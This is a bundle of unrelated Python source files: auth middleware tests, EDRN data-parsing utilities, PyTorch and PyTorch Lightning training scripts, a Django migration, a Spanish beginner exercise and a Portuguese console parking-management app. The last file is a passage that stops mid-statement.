"""Auth middleware tests."""
import asyncio
from typing import Any
from typing import Dict
from typing import Optional
from typing import Union
from unittest import mock
from unittest.mock import MagicMock
import pytest
from fastapi import FastAPI
from orjson import dumps # pylint: disable-msg=E0611
from starlette.requests import Request
from starlette.responses import Response
from truth.truth import AssertThat # type: ignore
from app.services.auth.base import create_tokens
from app.services.auth.middleware import TokenAuthMiddleware
from app.utils.exceptions import UnauthorizedError
from tests.test_services.test_auth.test_base import USER_UUID
def request_factory(token: Optional[Any] = None) -> Request:
"""Create test request."""
request_scope: Dict[str, Any] = {
"type": "http",
"method": "GET",
"headers": [],
}
if token is not None:
request_scope["headers"] = [
(b"authorization", f"Bearer {token}".encode("utf-8"),)
]
request: Request = Request(scope=request_scope)
return request
async def call_next(request: Request) -> Response: # pylint: disable=unused-argument
"""Mock call next method which will be called in middleware."""
return Response(status_code=200, content=b"test_call_next")
@pytest.mark.asyncio
async def test_auth_middleware_not_authorization() -> None:
"""Check auth middleware if Authorization header is not provided."""
middleware = TokenAuthMiddleware(app=FastAPI())
request: Request = request_factory()
response: Response = await middleware.dispatch(request=request, call_next=call_next)
call_next_response: Response = await call_next(request=request)
AssertThat(response.body).IsEqualTo(call_next_response.body)
@pytest.mark.asyncio
async def test_auth_middleware_not_token_in_header() -> None:
"""Check auth middleware if token not provided in header."""
middleware = TokenAuthMiddleware(app=FastAPI())
request: Request = request_factory(token="")
response: Response = await middleware.dispatch(request=request, call_next=call_next)
call_next_response: Response = await call_next(request=request)
AssertThat(response.body).IsEqualTo(call_next_response.body)
@pytest.mark.asyncio
async def test_auth_middleware_invalid_token() -> None:
"""Check auth middleware if token is not valid."""
middleware = TokenAuthMiddleware(app=FastAPI())
request: Request = request_factory(token="invalid")
response: Response = await middleware.dispatch(request=request, call_next=call_next)
AssertThat(response.status_code).IsEqualTo(UnauthorizedError.status_code)
@pytest.mark.asyncio
@mock.patch("app.extensions.redis_client.set")
@mock.patch("app.extensions.redis_client.get")
async def test_auth_middleware_raw_data_is_none(
get_mock: MagicMock,
set_mock: MagicMock,
) -> None:
"""Check auth middleware if tokens raw data from redis is None."""
get_mock.return_value = asyncio.Future()
get_mock.return_value.set_result(None)
set_mock.return_value = asyncio.Future()
set_mock.return_value.set_result(None)
middleware = TokenAuthMiddleware(app=FastAPI())
tokens: Dict[str, Union[str, int]] = await create_tokens(user_id=str(USER_UUID))
request: Request = request_factory(token=tokens["access_token"])
response: Response = await middleware.dispatch(request=request, call_next=call_next)
AssertThat(response.status_code).IsEqualTo(UnauthorizedError.status_code)
get_mock.assert_called_once_with(tokens["access_token"])
@pytest.mark.asyncio
@mock.patch("app.extensions.redis_client.set")
@mock.patch("app.extensions.redis_client.get")
async def test_auth_middleware(
get_mock: MagicMock,
set_mock: MagicMock,
) -> None:
"""Check auth middleware if everything is fine."""
get_mock.return_value = asyncio.Future()
get_mock.return_value.set_result(dumps({"user_id": str(USER_UUID), "test": "test"}))
set_mock.return_value = asyncio.Future()
set_mock.return_value.set_result(None)
tokens: Dict[str, Union[str, int]] = await create_tokens(user_id=str(USER_UUID))
middleware = TokenAuthMiddleware(app=FastAPI())
request: Request = request_factory(token=tokens["access_token"])
response: Response = await middleware.dispatch(request=request, call_next=call_next)
call_next_response: Response = await call_next(request=request)
get_mock.assert_called_once_with(tokens["access_token"])
AssertThat(response.body).IsEqualTo(call_next_response.body)
|
# encoding: utf-8
# Copyright 2008—2012 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
'''
EDRN Summarizer Service: utilities.
'''
import urllib.parse, re
# Why, why, why? DMCC, you so stupid!
# @yuliujpl: why is this even here?
DEFAULT_VERIFICATION_NUM = '0' * 40960
# URL schemes we consider "accessible"
# @yuliujpl: and this?
ACCESSIBLE_SCHEMES = frozenset((
'file',
'ftp',
'gopher',
'http',
'https',
'ldap',
'ldaps',
'news',
'nntp',
'prospero',
'telnet',
'wais',
'testscheme', # Used during testing.
))
# DMCC no longer separates rows by '!!'. Yay.
# @yuliujpl: and this?
_rowSep = re.compile(r'<recordNumber>[0-9]+</recordNumber><numberOfRecords>[0-9]+</numberOfRecords>'
r'<ontologyVersion>[0-9.]+</ontologyVersion>')
# @yuliujpl: and this?
def splitDMCCRows(horribleString):
'''Split a horrible DMCC string into rows. Returns an iterable.'''
i = _rowSep.split(horribleString)
i = i[1:] # Skip first item, which is the empty string to the left of the first row separator
return i
# converts csv file into dictionary, colkey and colvay determines which column
# is key and which column is value in the dictionary
# @yuliujpl: in the absence of coding standards, it's polite to adopt the style already in the file
# and not inject your own.
def csvToDict(file, colkey, colval):
dict = {}
with open(file) as f:
for line in f:
line_split = line.split(",")
if line_split[colkey].strip() not in list(dict.keys()):
dict[line_split[colkey].strip()] = []
dict[line_split[colkey].strip()].append(line_split[colval].strip())
# f.close() @yuliujpl: you don't need to close because you wrapped it in ``with``
return dict
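# Illustrative usage (the file name and values below are assumptions, not from the original code):
# given a file ``members.csv`` whose lines look like ``PI,Smith`` and ``PI,Jones``,
#     csvToDict('members.csv', 0, 1)  ->  {'PI': ['Smith', 'Jones']}
# Column indexes are zero-based, and repeated keys accumulate their values in a list.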
_biomutaRowSep = re.compile(',')
def splitBiomutaRows(horribleString):
'''Split a horrible Biomuta string into rows. Returns an iterable.'''
i = _biomutaRowSep.split(horribleString)
return i
# @yuliujpl: and this?
def validateAccessibleURL(s):
'''Ensure the unicode string ``s`` is a valid URL and one whose scheme we deem "accessible".
"Accessible" means that we reasonably expect our network APIs to handle locally- or network-
retrieval resources.
'''
parts = urllib.parse.urlparse(s)
return parts.scheme in ACCESSIBLE_SCHEMES
# @yuliujpl: and this?
START_TAG = re.compile(r'^<([-_A-Za-z0-9]+)>') # <Key>, saving "Key"
# @yuliujpl: and this?
def parseTokens(s):
'''Parse DMCC-style tokenized key-value pairs in the string ``s``.'''
if not isinstance(s, str): raise TypeError('Token parsing works on strings only')
s = s.strip()
while len(s) > 0:
match = START_TAG.match(s)
if not match: raise ValueError('Missing start element')
key = match.group(1)
s = s[match.end():]
match = re.match(r'^(.*)</' + key + '>', s, re.DOTALL)
if not match: raise ValueError('Unterminated <%s> element' % key)
value = match.group(1)
s = s[match.end():].lstrip()
yield key, value
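# Illustrative usage (the input string is hypothetical, not real DMCC output):
#     list(parseTokens('<Title>Biomarkers</Title><Count>3</Count>'))
#     ->  [('Title', 'Biomarkers'), ('Count', '3')]
# Each <Key>value</Key> pair is yielded in order; a missing start tag or an
# unterminated element raises ValueError.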
|
import torch
import torch.nn as nn
import src.run_utils as ru
from src.run_utils import create_directory, set_seed
from src.models import load_model
from src.loss import LossFunctions
from src.training import training
from src.configure import params_from_file, print_congiguration
def main():
""" Main method to execute the NN training. """
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Running on', device)
paths = params_from_file('paths')
training_params = params_from_file('training_params')
hparams = params_from_file('hparams')
ru.create_directory(paths.tensorboard_path)
hparam_runs = ru.get_hparam_runs(training_params, hparams)
print_congiguration(hparam_runs)
for counter, hparam in enumerate(hparam_runs):
print(f"Run {counter+1}/{len(hparam_runs)} ")
model = load_model(training_params, hparam, device=device)
if torch.cuda.device_count() > 1:
print("Using", torch.cuda.device_count(), "GPUs")
model = nn.DataParallel(model)
losses = LossFunctions(hparam, device=device)
cost = getattr(losses, training_params.loss_function)
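# Note (inferred from the expression below, not documented elsewhere): hparam.lr is
# treated as an exponent, so e.g. hparam.lr = 3 gives an Adam learning rate of 1e-3.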
optimizer = torch.optim.Adam(model.parameters(),
lr=10**(float(-hparam.lr)),
weight_decay=hparam.weight_decay)
training(training_params, model, cost, optimizer, device, hparam, paths)
print('Training finished.')
if __name__ == "__main__":
set_seed()
main()
|
# Generated by Django 2.0.3 on 2018-03-17 06:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('documents', '0003_userclient_slug'),
]
operations = [
migrations.AddField(
model_name='folderclient',
name='slug',
field=models.SlugField(
blank=True,
null=True,
unique=True,
verbose_name='Slug'),
),
]
|
"""P6E4 VICTORIA PEÑAS
Escribe un programa que te pida dos números, de manera que el segundo
sea mayor que el primero. El programa termina escribiendo los dos
números tal y como se pide:"""
num1=int(input("Escribe un número: "))
num2=int(input(f"Escribe un número mayor que {num1}: "))
while num1>=num2:
num2=int(input(f"{num2} no es mayor que {num1}. Vuelve \
a introducir un número: "))
print(f"Los números que has escrito son {num1} y {num2}")
|
from usuario import Usuario
from interacao import Interacao
from veiculo import Veiculo
from eventos import Eventos
from ocorrencias import Ocorrencias
from areasEspeciais import AreasEspeciais
def main():
print('Bem vindo ao MoraisParking!')
#Create the objects
usuario = Usuario()
interacao = Interacao()
veiculo = Veiculo()
evento = Eventos()
ocorrencia = Ocorrencias()
areasE = AreasEspeciais()
print(interacao.getInteracao())
entrada = int(input("Digite: "))
#In case an invalid option is entered
while entrada > 2:
print("Opção invalida. Tente novamente!")
print(interacao.getInteracao())
entrada = int(input("Digite: "))
#Start screen for logging in
while entrada < 3:
if entrada == 1:
print("\nRealizar Login")
print("1 - Funcionário\n2 - RH\n3 - Gestor")
x = int(input("Digite: "))
#Perform login
if x == 1:
print("\nTela de Login Funcionário")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "funcionário"
#Check whether the user exists
validacao = usuario.verificarUsuario(nome,senha,cargo)
#If validation fails
while validacao == False:
print("\nUsuário ou senha Inválidos!\nTente Novamente.\n")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "funcionário"
validacao = usuario.verificarUsuario(nome,senha,cargo)
elif x == 2:
print("\nTela de Login RH")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "RH"
#Check whether the user exists
validacao = usuario.verificarUsuario(nome,senha,cargo)
#If validation fails
while validacao == False:
print("\nUsuário ou senha Inválidos!\nTente Novamente.\n")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "RH"
validacao = usuario.verificarUsuario(nome,senha,cargo)
if x == 3:
print("\nTela de Login Gestor")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "gestor"
#Check whether the user exists
validacao = usuario.verificarUsuario(nome,senha,cargo)
#If validation fails
while validacao == False:
print("\nUsuário ou senha Inválidos!\nTente Novamente.\n")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "gestor"
validacao = usuario.verificarUsuario(nome,senha,cargo)
#If validation succeeds for an employee
if (validacao == True and x == 1):
print("\nMenu do Funcionário")
print(interacao.getInteracao2())
entradaI2 = int(input("Digite: "))
#Interaction loop
while entradaI2 < 9:
#Vehicle registration interaction
if entradaI2 == 1:
print("\nTela de cadastro de veículos")
matricula = input('Insira uma matricula: ')
nome = input('Insira um nome: ')
placa = input('Insira um placa: ')
marca = input('Insira um marca: ')
tipo = input('Insira um tipo: ')
print("\n"+interacao.getInteracao4())
bloco = int(input("Digite: "))
veiculo.cadastrarVeiculo(matricula,nome,placa,marca,tipo,bloco)
print("\nVeículo cadastrado com sucesso!")
print("O que mais deseja fazer?")
#Vehicle identification interaction
elif entradaI2 == 2:
print("\nTela de Identificação do Veículos")
placa = input('Digite a placa do veiculo: ')
#Only absent vehicles are identified
status = "Ausente"
#Check whether the vehicle exists
if veiculo.pesquisarVeiculo(placa,status):
print("\nEstacionar " + interacao.getInteracao4())
bloco = int(input("Digite o bloco para o veículo estacionar: "))
print(veiculo.inserirEstaciomanento(bloco,placa))
#If it does not exist, ask to register it
else:
#Whether or not to register it
rs = input("Deseja cadastrar o Veículo (S/N)?: ")
if rs == 'S' or rs == 's':
print("\nCadastre o Veículo\n")
matricula = input('Insira um matricula: ')
nome = input('Insira um nome: ')
placa = input('Insira um placa: ')
marca = input('Insira um marca: ')
tipo = input('Insira um tipo: ')
data = input('Insira um data: ')
hora = input('Insira um hora: ')
bloco = input('Insira um bloco: ')
veiculo.cadastrarVeiculo(matricula,nome,placa,marca,tipo,data,hora,bloco)
print("Veículo cadastrado com sucesso!")
print("O que mais deseja fazer?")
#If the user does not want to register, the system does nothing
else:
print()
#Vehicle removal interaction
elif entradaI2 == 3:
print("\nTela de remoção de veículo")
placa = input('Digite a placa do veiculo: ')
status = "Presente"
#Check whether the vehicle exists
teste = veiculo.pesquisarVeiculo(placa,status)
if teste == True:
#If it exists, ask whether the user really wants to remove it
rs = input('Deseja realmente remover o veículo? (S/N): ')
if rs == 'S' or rs == 's':
print(veiculo.removerVeiculo(placa))
#If it does not exist, show an error message
else:
print("Veículo não encontrado!")
#Event registration interaction
elif entradaI2 == 4:
print("\nCadastro de Eventos")
nome = str(input('Nome: '))
inicio = str(input('Data Inicio (dd/MM/yyyy): '))
fim = str(input('Data Fim (dd/MM/yyyy): '))
print("\n"+interacao.getInteracao4())
local = int(input("Digite: "))
vagas = str(input('QNT Vagas: '))
evento.cadastrarEventos(nome,inicio,fim,local,vagas)
print("\nEvento cadastrado com sucesso!")
print("O que mais deseja fazer?")
#Incident registration interaction
elif entradaI2 == 5:
print("\nCadastro de Ocorrências")
placa = str(input("Placa: "))
matricula = str(input("Matricula: "))
nome = str(input("Nome: "))
marca = str(input("Marca: "))
tipo = str(input("Tipo: "))
#Show the interaction listing the incident types
print(interacao.getInteracaoOcorrencias())
tipoOcorrencia = int(input("Ocorrencia: "))
data = str(input("Data (dd/MM/yyyy): "))
print("\n"+interacao.getInteracao4())
local = int(input("Digite: "))
ocorrencia.cadastrarOcorrencia(placa,matricula,nome,marca,tipo,tipoOcorrencia,data,local)
print("\nOcorrência cadastrada com sucesso!")
print("O que mais deseja fazer?")
#Parking-lot monitoring interaction
elif entradaI2 == 6:
print("\nDigite uma das opções!")
print("1 - Ausentes")
print("2 - Presentes")
x = int(input("Digite: "))
#If the choice is absent vehicles
if x == 1:
print("\nDigite uma das opções!")
print("1 - Por Blocos")
print("2 - Por Data")
c = int(input("Digite: "))
#If filtering by block
if c == 1:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(veiculo.monitoramentoVeiculos(valor,"Ausente"))
print("Total de vagas da respectiva área")
#Parking-space totals for the selected area
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis())+ " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#If filtering by date
elif c == 2:
data = input("Digite uma data (dd/MM/yyyy): ")
print("\nTela de Monitoramento")
print(veiculo.pesquisarVeiculoPorData(data,"Ausente"))
print("Total de vagas da respectiva área")
#Parking-space totals for the selected area
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#If the choice is present vehicles
elif x == 2:
print("\nDigite uma das opções!")
print("1 - Por Blocos")
print("2 - Por Data")
c = int(input("Digite: "))
#If filtering by block
if c == 1:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(veiculo.monitoramentoVeiculos(valor,"Presente"))
print("Total de vagas da respectiva área")
#Parking-space totals for the selected area
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()- evento.totalDeVagasPorBloco(valor) - areasE.qntDeVagasPorBloco(valor)) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas() + evento.totalDeVagasPorBloco(valor) + areasE.qntDeVagasPorBloco(valor)) +\
" | Vagas reservadas para Eventos: " + str(evento.totalDeVagasPorBloco(valor)) + \
" | Vagas de Áreas Especiais: " + str(areasE.qntDeVagasPorBloco(valor))+" |")
#If filtering by date
elif c == 2:
data = input("Digite uma data (dd/MM/yyyy): ")
print("\nTela de Monitoramento")
print(veiculo.pesquisarVeiculoPorData(data,"Presente"))
print("Total de vagas da respectiva área")
#Parking-space totals for the selected area
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#Event monitoring interaction
elif entradaI2 == 7:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(evento.monitorarEventos(valor))
#Incident monitoring interaction
elif entradaI2 == 8:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(ocorrencia.monitorarOcorrencia(valor))
#Exit the system directly without logging out
elif entradaI2 == 0:
print('Volte quando quiser! =)')
exit()
print("\nMenu do Funcionário")
print(interacao.getInteracao2())
entradaI2 = int(input("Digite: "))
if entradaI2 == 100:
print("Usuário deslogado!")
#If validation succeeds for HR
elif (validacao == True and x == 2):
print("\nMenu do RH")
print(interacao.getInteracaoRH())
entrada = int(input("Digite: "))
while entrada != 100:
#Register an employee
if entrada == 1:
print("\nCadastre um Funcionário")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = ""
print("1 - Funcionário\n2 - RH\n3 - Gestor")
x = int(input("Digite: "))
if x == 1:
cargo = "funcionário"
elif x == 2:
cargo = "RH"
elif x == 3:
cargo = "gestor"
usuario.cadastrar(nome, senha,cargo)
print("\nCadastro realizado com sucesso!")
print('O que mais deseja fazer?')
#Grant permission to a special area
elif entrada == 2:
print("\nDar Permissão "+interacao.getInteracao4())
valor = int(input("Digite: "))
status = "Ativa"
print(areasE.monitoramentoAreasEspeciaisPorBloco(valor, status))
#Check whether a special area exists in that block
if areasE.verificarAreaEspecial(valor):
id = input("\nDigite a ID da Área Especial: ")
print(interacao.getInteracaoAcesso())
acesso = int(input("Quem terá acesso? "))
print(areasE.darPermissao(id,acesso))
else:
print("Não existe Área Especial cadastrada nesse bloco")
print("\nMenu do RH")
print(interacao.getInteracaoRH())
entrada = int(input("Digite: "))
if entrada == 100:
print("Usuário deslogado!")
#If validation succeeds for a manager
elif (validacao == True and x == 3):
print("\nMenu do Gestor")
print(interacao.getInteracaoGestor())
entradaI2 = int(input("Digite: "))
#Register special areas
while entradaI2 < 10:
if entradaI2 == 1:
print("\nCadatrar " + interacao.getInteracao4())
bloco = int(input("Bloco: "))
print("\nQuem terá acesso?")
#Interaction listing who may have access
print(interacao.getInteracaoAcesso())
acesso = int(input("Acesso: "))
inicio = input("Inicio (dd/MM/yyyy): ")
fim = input("Fim (dd/MM/yyyy): ")
vagas = input("Vagas: ")
areasE.cadastrarAreaEspecial(bloco,acesso,inicio,fim,vagas)
print('\nArea Especial cadastrada com sucesso!')
print('O que mais deseja fazer?')
#Parking-lot monitoring
elif entradaI2 == 2:
print("\nDigite uma das opções!")
print("1 - Ausentes")
print("2 - Presentes")
x = int(input("Digite: "))
#If the choice is absent vehicles
if x == 1:
print("\nDigite uma das opções!")
print("1 - Por Blocos")
print("2 - Por Data")
c = int(input("Digite: "))
#If filtering by block
if c == 1:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(veiculo.monitoramentoVeiculos(valor,"Ausente"))
print("Total de vagas da respectiva área")
#Parking-space totals for the selected area
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis())+ " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#If filtering by date
elif c == 2:
data = input("Digite uma data (dd/MM/yyyy): ")
print("\nTela de Monitoramento")
print(veiculo.pesquisarVeiculoPorData(data,"Ausente"))
print("Total de vagas da respectiva área")
#Parking-space totals for the selected area
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#If the choice is present vehicles
elif x == 2:
print("\nDigite uma das opções!")
print("1 - Por Blocos")
print("2 - Por Data")
c = int(input("Digite: "))
#If filtering by block
if c == 1:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(veiculo.monitoramentoVeiculos(valor,"Presente"))
print("Total de vagas da respectiva área")
#Parking-space totals for the selected area
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()- evento.totalDeVagasPorBloco(valor) - areasE.qntDeVagasPorBloco(valor)) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas() + evento.totalDeVagasPorBloco(valor) + areasE.qntDeVagasPorBloco(valor)) +\
" | Vagas reservadas para Eventos: " + str(evento.totalDeVagasPorBloco(valor)) + \
" | Vagas de Áreas Especiais: " + str(areasE.qntDeVagasPorBloco(valor))+" |")
#If filtering by date
elif c == 2:
data = input("Digite uma data (dd/MM/yyyy): ")
print("\nTela de Monitoramento")
print(veiculo.pesquisarVeiculoPorData(data,"Presente"))
print("Total de vagas da respectiva área")
#Parking-space totals for the selected area
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#Event monitoring
elif entradaI2 == 3:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento\n")
print(evento.monitorarEventos(valor))
#Incident monitoring
elif entradaI2 == 4:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento\n")
print(ocorrencia.monitorarOcorrencia(valor))
#Special-area monitoring
elif entradaI2 == 5:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
status = 'Ativa'
print("\nTela de Monitoramento\n")
print(areasE.monitoramentoAreasEspeciaisPorBloco(valor,status))
#Remove special areas
elif entradaI2 == 6:
#First show the existing areas
print(areasE.monitoramentoAreasEspeciaisPorBloco(0,"Ativa"))
print()
id = input("Digite a ID da Área Especial que deseja remover: ")
#Then delete the chosen area
print(areasE.removerAreaEspecial(id))
print('O que mais deseja fazer?')
#Register events
elif entradaI2 == 7:
print("\nCadastro de Eventos")
nome = str(input('Nome: '))
inicio = str(input('Data Inicio (dd/MM/yyyy): '))
fim = str(input('Data Fim (dd/MM/yyyy): '))
print("\n"+interacao.getInteracao4())
local = int(input("Digite: "))
vagas = str(input('QNT Vagas: '))
evento.cadastrarEventos(nome,inicio,fim,local,vagas)
print("\nEvento cadastrado com sucesso!")
print("O que mais deseja fazer?")
#Grant permission to special areas
elif entradaI2 == 8:
print("\nDar Permissão "+interacao.getInteracao4())
valor = int(input("Digite: "))
status = "Ativa"
print(areasE.monitoramentoAreasEspeciaisPorBloco(valor, status))
#Check whether an area exists in the chosen block
if areasE.verificarAreaEspecial(valor):
id = input("\nDigite a ID da Área Especial: ")
print(interacao.getInteracaoAcesso())
acesso = int(input("Quem terá acesso? "))
print(areasE.darPermissao(id,acesso))
else:
print("Não existe Área Especial cadastrada nesse bloco")
elif entradaI2 == 9:
print("\nTela de extração de Relatórios")
print("Extrair relatório\n" + interacao.getInteracaoRelatorios())
x = int(input("Digite: "))
if x == 1:
veiculo.gerarRelatorio()
print("\nRelatório extraído com sucesso!")
elif x == 2:
evento.gerarRelatorio()
print("\nRelatório extraído com sucesso!")
elif x == 3:
ocorrencia.gerarRelatorio()
print("\nRelatório extraído com sucesso!")
elif x == 4:
areasE.gerarRelatorio()
print("\nRelatório extraído com sucesso!")
#Exit the system directly
elif entradaI2 == 0:
print('Volte quando quiser! =)')
exit()
print("\nMenu do Gestor")
print(interacao.getInteracaoGestor())
entradaI2 = int(input("Digite: "))
#Log the user out
if entradaI2 == 100:
print("Usuário deslogado!")
#Exit the system directly
elif entrada == 0:
print('Volte quando quiser! =)')
exit()
print(interacao.getInteracao())
entrada = int(input("Digite: "))
main()
|
# coding=utf-8
# Copyleft 2019 project LXRT.
import sys
import traceback
import os
import json
import random
import collections
import shutil
import torch
import torch.nn as nn
from torch.utils.data.dataloader import DataLoader
import pytorch_lightning as pl
from pytorch_lightning.loggers import WandbLogger
from pytorch_lightning.plugins import DDPPlugin
from tqdm import tqdm
import numpy as np
import cv2
from detectron2.structures import BoxMode
import wandb
import utils
from param import args
from tasks.simmc2_coreference_data_pl import SIMMC2DataModule
from tasks.simmc2_coreference_model_pl import SIMMC2CoreferenceModelWithDescriptions
USE_MODEL_WITH_DESCRIPTIONS = True
SEEDS = np.arange(122, 300, 5)
DataTuple = collections.namedtuple("DataTuple", 'dataset loader evaluator')
wandb.login()
args.qa = False
class CustomModelCheckpoint(pl.callbacks.ModelCheckpoint):
def __init__(self, dirpath, filename):
self._token_to_replace = '$run_id$'
self.filename = filename
super().__init__(
monitor='val/object_f1',
dirpath=dirpath,
filename=self.filename,
save_last=True,
save_top_k=2,
mode='max',
every_n_epochs=1,
auto_insert_metric_name=False
)
def on_validation_end(self, trainer: pl.Trainer, pl_module):
"""
ModelCheckpoint hardcodes self.filename = '{epoch}' in its on_train_start().
But custom callbacks are called _before_ ModelCheckpoint, meaning setting it
in our on_train_start() would just get overwritten. Therefore, we set it here in
on_validation_end(), as checkpointing in Lightning is currently tied to
Validation performance.
https://github.com/PyTorchLightning/pytorch-lightning/issues/2042
"""
if self._token_to_replace in self.filename and trainer.global_rank == 0:
self.filename = self.filename.replace(
self._token_to_replace, str(trainer.logger.version))
super().on_validation_end(trainer, pl_module)
def get_model(batches_per_epoch=-1):
# create model class
if args.load:
print(f"Loading model from '{checkpoint_dir}/{args.load}'")
coreference_model = SIMMC2CoreferenceModelWithDescriptions.load_from_checkpoint(
f"{checkpoint_dir}/{args.load}", name=model_name,
max_seq_length=model_config['max_seq_length'], f=model_config['input_features'],
batches_per_epoch=batches_per_epoch, lr=args.lr, final_layer=args.final_layer,
ablation=args.ablation)
else:
coreference_model = SIMMC2CoreferenceModelWithDescriptions(
model_name, model_config['max_seq_length'], f=model_config['input_features'],
batches_per_epoch=batches_per_epoch, lr=args.lr, final_layer=args.final_layer,
ablation=args.ablation)
return coreference_model
def main_train():
# basic datamodule
data_module_train_test = SIMMC2DataModule.train_test_data_module(
args.batch_size, args.num_workers, model_config['max_seq_length'])
# data_module_train_test.setup()
# avoid duplicating data, so comment out this line
# batches_per_epoch = len(data_module_train_test.train_dataloader())
coreference_model = get_model(batches_per_epoch=9110)
trainer = pl.Trainer(**trainer_config)
trainer.fit(coreference_model, datamodule=data_module_train_test)
if coreference_model.global_rank == 0:
# only print once in main process
print(f"\nBest model saved at '{checkpoint_callback.best_model_path}'")
if log_with_wandb and checkpoint_callback.best_model_path:
# log final devtest results to wandb
wandb_run_id = coreference_model.logger.version
args.load = checkpoint_callback.best_model_path.split('/simmc2_533/')[-1]
# trainer_config['logger']
print()
coreference_model.logger.experiment.notes = f"Model saved as: '{args.load}'"
# a limitation of DDP is that we cannot run .fit and .test in the same script
# main_test(wandb_run_id)
print(f"To test this model in devtest, run: "
f"test \"--wandb_id {wandb_run_id} --load {args.load}\"\n\n")
def main_test(wandb_run_id: str = None):
trainer_config['gpus'] = 1 # do not test in more than 1 GPU to avoid some DDP issues
trainer_config['logger'] = WandbLogger(
name=model_name, project='exloring-mm-in-simmc2',
settings=wandb.Settings(_disable_stats=True), version=wandb_run_id) \
if log_with_wandb else True
# basic datamodule
data_module_train_test = SIMMC2DataModule.train_test_data_module(
args.batch_size, args.num_workers, model_config['max_seq_length'])
coreference_model = get_model()
trainer = pl.Trainer(**trainer_config)
test_results = trainer.test(
coreference_model,
datamodule=data_module_train_test)
print(test_results)
if log_with_wandb:
if wandb_run_id is None:
wandb_run_id = coreference_model.logger.version
# log test results
print(f"Logging test results to {wandb_run_id}")
if len(test_results) > 1:
raise ValueError(
f"test_results is too long: len={len(test_results)}\ntest_results={test_results}")
# need to log into wandb: object f1, recall, precision and object f1 std, object similarity
for key, value in test_results[0].items():
# we only want to have 1 value for test at most
coreference_model.logger.experiment.summary[key] = value
# coreference_model.logger.experiment.summary.update()
def main_predict():
trainer_config['gpus'] = 1 # do not predict in more than 1 GPU to avoid some DDP issues
data_module = SIMMC2DataModule.empty_data_module(
args.batch_size, args.num_workers, model_config['max_seq_length'])
data_module.setup()
coreference_model = get_model()
trainer = pl.Trainer(**trainer_config)
# create prediction files for each dataset split
splits_to_predict = ['devtest'] # , 'teststd_public']
for split in splits_to_predict:
predictions = trainer.predict(
coreference_model,
dataloaders=data_module.custom_dataloader(split))
coreference_model.post_process_predictions(
predictions, f"snap/dstc10-simmc-{split}-pred-subtask-2.json",
extra={'load': args.load})
if __name__ == "__main__":
keys_to_print = ['load', 'output', 'num_runs', 'lr', 'dropout', 'llayers', 'xlayers', 'rlayers']
# 'train_data_ratio', 'simmc2_input_features', 'simmc2_max_turns']
_info = {k: getattr(args, k) for k in keys_to_print}
model_config = {
'batch_size': args.batch_size,
'dropout': args.dropout,
'epochs': args.epochs,
'learning_rate': args.lr,
# max_seq_length 50 is fine for lxr322 to lxr533
# max_seq_length 30 is fine for lxr744
# max_seq_length 25 is fine for lxr955
'max_seq_length': 50,
'random_seed': 123,
'image_feature_file': args.image_feature_file,
'image_categories': args.image_categories,
'pred_threshold': 0.35,
'input_features': args.simmc2_input_features
}
feature_str = '-'.join([f"{k}={v}" for k, v in args.simmc2_input_features.items()])
feature_str = feature_str.replace('True', 'T').replace('False', 'F')
if args.tiny:
feature_str += '-tiny'
model_name = f"{feature_str}-epochs={args.epochs}"
log_with_wandb = not ('WANDB_MODE' in os.environ and os.environ['WANDB_MODE'] == 'disabled')
if log_with_wandb and args.mode in ['train', 'test'] and not args.tiny:
logger = WandbLogger(
name=model_name, project='exloring-mm-in-simmc2',
settings=wandb.Settings(_disable_stats=True), version=args.wandb_id)
else:
logger = True
checkpoint_dir = f"{args.output}_{args.llayers}{args.xlayers}{args.rlayers}"
# instead of saving as val/object_f1, we do val@object_f1 to avoid creating folders due to the /
checkpoint_filename = 'coref-$run_id$-val@f1={val/object_f1:.3f}-' \
'step={step}-train@loss{train/loss:.3f}-' + feature_str
